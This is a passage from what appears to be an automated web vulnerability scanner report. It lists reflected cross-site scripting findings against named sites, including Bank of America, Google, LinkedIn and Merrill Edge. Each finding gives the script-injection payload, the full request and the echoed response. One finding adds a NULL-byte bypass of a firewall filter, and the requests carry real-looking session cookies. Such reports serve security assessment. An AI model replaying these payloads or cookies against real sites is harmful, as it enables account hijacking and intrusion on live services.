Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:21:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1409


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/surveys/bridge8e738"><script>alert(1)</script>9ea3cf807cd/surveybridge.cfmsurveynumber=9">
...[SNIP]...

1.361. http://www.bankofamerica.com/surveys/popup_visit.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/popup_visit.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4b84"><script>alert(1)</script>1298aca11cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveysc4b84"><script>alert(1)</script>1298aca11cc/popup_visit.cfm?survey_url=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust=LOCP&survey_name=CTS%20Survey%20for%20ATM%20BC%20Locator%20II&surveynumber=9 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys/survey_select.cfm?surveynumber=9&blurwindow=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; state=MA; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:21:55 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1539


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/surveysc4b84"><script>alert(1)</script>1298aca11cc/popup_visit.cfmsurvey_url=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust=LOCP&survey_name=CTS%20Survey%20for%20ATM%20BC%20Locator%20II&surveynumber=9">
...[SNIP]...

1.362. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/survey_popup_invoker.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c6e"><script>alert(1)</script>c9268a135a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys78c6e"><script>alert(1)</script>c9268a135a4/survey_popup_invoker.cfm?surveynumber=9&blurwindow= HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm?surveynumber=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; state=MA; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:22:12 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1422


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/surveys78c6e"><script>alert(1)</script>c9268a135a4/survey_popup_invoker.cfmsurveynumber=9&blurwindow=">
...[SNIP]...

1.363. http://www.bankofamerica.com/surveys/survey_select.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/survey_select.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4d0"><script>alert(1)</script>5e7e5aa23b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys1b4d0"><script>alert(1)</script>5e7e5aa23b6/survey_select.cfm?surveynumber=9&blurwindow= HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm?surveynumber=9&blurwindow=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; BOFA_LOCALE_COOKIE=en-US; cmRS=t3=1309270224924&pi=homepage%3AContent%3APersonal%3Bhome_personal; BIGipServerngen-www.80=916895403.20480.0000; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; CFID=139695610; CFTOKEN=53028ef%2D0000d77b%2D45df%2D1e0a%2Db202%2D839b8e390000; GEOSERVER=1; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; state=MA

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 28 Jun 2011 21:22:07 GMT
Content-type: text/html
Page-Completion-Status: Normal
Content-Length: 1415


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/surveys1b4d0"><script>alert(1)</script>5e7e5aa23b6/survey_select.cfmsurveynumber=9&blurwindow=">
...[SNIP]...

1.364. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fea"><script>alert(1)</script>b94ecade82a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle_and_personal_loansd9fea"><script>alert(1)</script>b94ecade82a/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:36:03 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/vehicle_and_personal_loansd9fea"><script>alert(1)</script>b94ecade82a/index.cfm">
...[SNIP]...

1.365. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of the cm_mmc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37782"%20a%3db%20fdfd2d1a177 was submitted in the cm_mmc parameter. This input was echoed as 37782" a=b fdfd2d1a177 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /vehicle_and_personal_loans/index.cfm?template=auto_loans&cm_mmc=eLend-Auto-_-BAC-Homepage-_-AutoLoans-_-TextLink37782"%20a%3db%20fdfd2d1a177 HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:36:10 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
X-FRAME-OPTIONS: SAMEORIGIN
Page-Completion-Status: Normal
Connection: close


                                                                                                                                                    <style type="text/css" media="all">
.stb_newtext {
color:#CC0000;
}
.standard-text1 {
col
...[SNIP]...
ect" coords="465,123,562,145" alt="Visit the Car Buying Center" href="http://www.bankofamerica.com/carbuyingcenter/?referrer_id=ZBOAAWL0001FI&amp;cm_mmc=eLend-Auto-_-BAC-Homepage-_-AutoLoans-_-TextLink37782" a=b fdfd2d1a177">
...[SNIP]...

1.366. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of the cm_mmc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65859"%3beae95cd6beb was submitted in the cm_mmc parameter. This input was echoed as 65859";eae95cd6beb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle_and_personal_loans/index.cfm?template=auto_loans&cm_mmc=eLend-Auto-_-BAC-Homepage-_-AutoLoans-_-TextLink65859"%3beae95cd6beb HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:36:24 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
X-FRAME-OPTIONS: SAMEORIGIN
Page-Completion-Status: Normal
Connection: close


                                                                                                                                                    <style type="text/css" media="all">
.stb_newtext {
color:#CC0000;
}
.standard-text1 {
col
...[SNIP]...
<a href='http://www.bankofamerica.com/carbuyingcenter/?referrer_id=ZBOAAWL0001FI&amp;cm_mmc=eLend-Auto-_-BAC-Homepage-_-AutoLoans-_-TextLink65859";eae95cd6beb'>
...[SNIP]...

1.367. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a138(a)c210aae7566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?9a138(a)c210aae7566=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:31:27 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
it()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?9a138(a)c210aae7566\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

1.368. http://www.greencrestcapital.com/phpt/phpThumb.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greencrestcapital.com
Path:   /phpt/phpThumb.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3790b<script>alert(1)</script>13e4b28695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /phpt/phpThumb.php?src=/assets/images/chegg-logo.jpg&h=35q=100&3790b<script>alert(1)</script>13e4b28695=1 HTTP/1.1
Host: www.greencrestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.greencrestcapital.com/research
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4d40209ad7f24=n70ht0h2vu4n4n6jb55iomcc02

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:34:00 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.12 FrontPage/5.0.2.2635 mod_ssl/2.0.63 OpenSSL/0.9.7e-p1
X-Powered-By: PHP/5.2.12
Content-Length: 656
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.......d........4....PLTE.......5P.....IDATX.c` .02.1.p404|.`..Q.8&.CX......c..
.fP....$BZ,.    O.............(0...UM..5.@ZD.i..t(    t..EO(lMG.F.3...a.*.M..(j.y.30..q....Q.9oy.....B*F...6..
...[SNIP]...
<br>

phpThumb() v1.7.9-200805132119

Forbidden parameter: 3790b<script>alert(1)</script>13e4b28695

1.369. http://www.greencrestcapital.com/phpt/phpThumb.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greencrestcapital.com
Path:   /phpt/phpThumb.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 24225<script>alert(1)</script>aae7f2df1de was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /phpt/phpThumb.php?src=/assets/images/chegg-logo.jpg24225<script>alert(1)</script>aae7f2df1de&h=35q=100 HTTP/1.1
Host: www.greencrestcapital.com
Proxy-Connection: keep-alive
Referer: http://www.greencrestcapital.com/research
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4d40209ad7f24=n70ht0h2vu4n4n6jb55iomcc02

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:34:00 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.12 FrontPage/5.0.2.2635 mod_ssl/2.0.63 OpenSSL/0.9.7e-p1
X-Powered-By: PHP/5.2.12
Content-Length: 1001
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.......d........4....PLTE.......5P.....IDATX....K.a....N..F>;5&lp7ong2t..%.m.s...i...^.N..E.s.-.K../.$..|aob...4d..~..B.G.....L..F.    .>....<...../....p.H$...^.......
.$..    .e\.|........
...[SNIP]...
<br>

phpThumb() v1.7.9-200805132119

"/home/shb7_134/greencrestcapital.com/public_html/assets/images/chegg-logo.jpg24225<script>alert(1)</script>aae7f2df1de" does not exist

1.370. http://www.ig.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ig.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4609e%3balert(1)//6d6d79ce8da was submitted in the url parameter. This input was echoed as 4609e;alert(1)//6d6d79ce8da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=4609e%3balert(1)//6d6d79ce8da HTTP/1.1
Host: www.ig.gmodules.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 502 Bad Gateway
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 28 Jun 2011 01:23:46 GMT
Expires: Tue, 28 Jun 2011 01:23:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 71
Server: GSE

Unable to retrieve spec for 4609e;alert(1)//6d6d79ce8da. HTTP error 502

1.371. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload bf958<script>alert(1)</script>5385d7c6123 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.businessinsider.com%2Fhenry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6bf958<script>alert(1)</script>5385d7c6123 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/henry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 01:22:39 GMT
Content-Length: 215

IN.Tags.Share.handleCount({"count":0,"url":"http://www.businessinsider.com/henry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6bf958<script>alert(1)</script>5385d7c6123"});

1.372. https://www.merrilledge.com/M/ScriptResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /M/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0073e86'-alert(1)-'4780651d704 was submitted in the d parameter. This input was echoed as 73e86'-alert(1)-'4780651d704 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /M/ScriptResource.axd?d=JkuxuEcB4odAkMOavkxzE80tol3WWfuRAePCVDhr3sjdHIe9nf_la5jF8Hgq_Obozt2DPIxAOcaXv4iPTB_9K5OwVk4OEEDpgoiMlc1O-Lxbw02k-6_ZeQw8YS0F530Jj6SLyh_IK5vQBhK__Q08jXopyjLxcQqKiigGwKBcYv4k87_Y342Hlj1e6aDSyTAYz1jILXb7Nc-HtBW9kc1EkZyiHAzOAh1aIGpm7CrwVod8DKwN0%0073e86'-alert(1)-'4780651d704&t=2ebd21 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
Referer: https://www.merrilledge.com/m/pages/home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=iYIJRr+FIATBfhYxNnLWMeqstvm40oPKkNjub0RGzKoXFttv5kiz/Yi1SnHPsDX7hsgoS6dzQFEZOPsDKkRJmXXQoGmONxkpBrwBznuqggT51x4K3Je6VIcjcmVnlf4e2WhEqKu7ZHkB4+9zbzF/c58kXzq/6rRAgd0lGmO76/FH/dBdEwkmAi/u/JfApKJr0H2RY7pfGK8tQ21wiLlIubEgnFLbThqwurs8rqzS5xBg3ohRNcFfXqtOq/tzWS2wrC0U2eSrpGcNca0dUjnAeTwREji7WtnBN4uxI/Auct3qeqx9zGAbVemWpWTRXMOEAUcOFvQLh8XZqbcU/35p/guZ/Vk72mrrlxSv1xypG8J+M8Bef2Qv7SxLxxGO+tFDX9xDPCu5/ZsGju720qtWvXDDHWwR7rY9hYXvmQBimuWRgEy30HtHY86Ams+XnlH64vz4utyt0BwOtMjdx//c0lGzzIo1iLdsje5zlX0pmVGYaQXBcsiBJK30y30frgo6gjEcOLlQL2Clw3mz37PvNVWmhO1mAtkNuP8jidDInt00+jheHGnEVOhFuN2nW1OtYgj50Rujltsk3YvNghQstPmg8L83taGMJDzxUR46mMH2Ux2nSRgncCQlOwrAVGLYPJT054HFtsFBDPjLrYviOMoSGwOYOP6g; pxs=34c2975d574840c69344a112e485f657

Response

HTTP/1.1 200 OK
Date: Wed, 29 Jun 2011 11:53:13 GMT
